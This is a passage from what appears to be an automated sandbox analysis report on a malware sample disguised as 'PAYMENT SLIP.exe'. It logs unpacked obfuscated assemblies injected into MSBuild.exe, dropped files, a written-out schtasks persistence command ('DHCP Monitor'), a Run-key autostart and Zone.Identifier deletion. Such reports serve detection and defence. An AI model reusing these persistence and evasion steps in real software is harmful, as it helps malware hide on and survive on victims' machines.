        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_014C74AC push ecx; ret 12_2_014C74AD
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_014C74B8 push ebp; ret 12_2_014C74B9
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_014C9D58 pushad ; retf 12_2_014C9D59
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_014C9D54 push eax; retf 12_2_014C9D55
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_014C5CE6 push 00000005h; iretd 12_2_014C5CE8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 12_2_06CD0E48 push ebx; retf 12_2_06CD0EB2
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 12.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 19.2.MSBuild.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeFile created: C:\Users\user\AppData\Local\Temp\nsz6311.tmp\qm1tw12xr.dllJump to dropped file
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeFile created: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeJump to dropped file
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeFile created: C:\Users\user\AppData\Local\Temp\nsy2D8A.tmp\qm1tw12xr.dllJump to dropped file
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeFile created: C:\Users\user\AppData\Local\Temp\nsj3D87.tmp\qm1tw12xr.dllJump to dropped file
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeFile created: C:\Users\user\AppData\Local\Temp\nsiFB00.tmp\qm1tw12xr.dllJump to dropped file
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeFile created: C:\Users\user\AppData\Local\Temp\nsb1C63.tmp\qm1tw12xr.dllJump to dropped file
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeFile created: C:\Users\user\AppData\Local\Temp\nshD279.tmp\qm1tw12xr.dllJump to dropped file

        Boot Survival:

        barindex
        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp3E70.tmp'
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jnckjcfxJump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jnckjcfxJump to behavior

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
